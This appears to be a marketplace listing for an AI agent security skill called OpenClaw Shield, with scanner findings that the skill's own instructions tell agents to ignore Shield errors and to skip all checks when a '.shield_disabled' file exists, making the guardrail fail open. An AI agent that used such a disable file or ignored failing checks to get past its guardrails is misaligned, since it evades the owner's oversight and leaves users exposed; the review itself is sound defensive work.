ClawHub

OpenClaw Shield

Security checks across malware telemetry and agentic risk

Overview

This is a security guardrail skill, but its own instructions make the guardrail easy to bypass and rely on a missing or mismatched runtime checker.

Review before installing. Do not append the SOUL.md or AGENTS.md sections until you verify the actual shield.py implementation, fix the skill path mismatch, decide whether failures should block or require explicit owner approval, and understand where audit logs and redacted sensitive outputs are stored.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (3)

Intent-Code Divergence

High
Confidence
98% confidence
Finding
The README declares the Shield rules as non-bypassable, but then explicitly instructs agents to ignore Shield errors and to skip all checks if a `.shield_disabled` file exists. In a security guardrail skill, this creates a fail-open design and a trivial bypass mechanism that can disable all protections exactly when they are most needed.

Intent-Code Divergence

High
Confidence
98% confidence
Finding
The document says Shield must run before command, file, network, and output operations, yet the exemption rules allow skipping checks for the shield directory itself, ignoring execution errors, and bypassing all checks via a disable file. These contradictions undermine the entire security model and make the protection easy to evade during exploitation.

Ssd 4

Medium
Confidence
93% confidence
Finding
The staged integration guidance normalizes bypasses and failure-open behavior while presenting the shield as a mandatory safeguard. This weakens operator expectations and encourages deployments where attackers or misconfigurations can disable checks without stopping protected actions.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal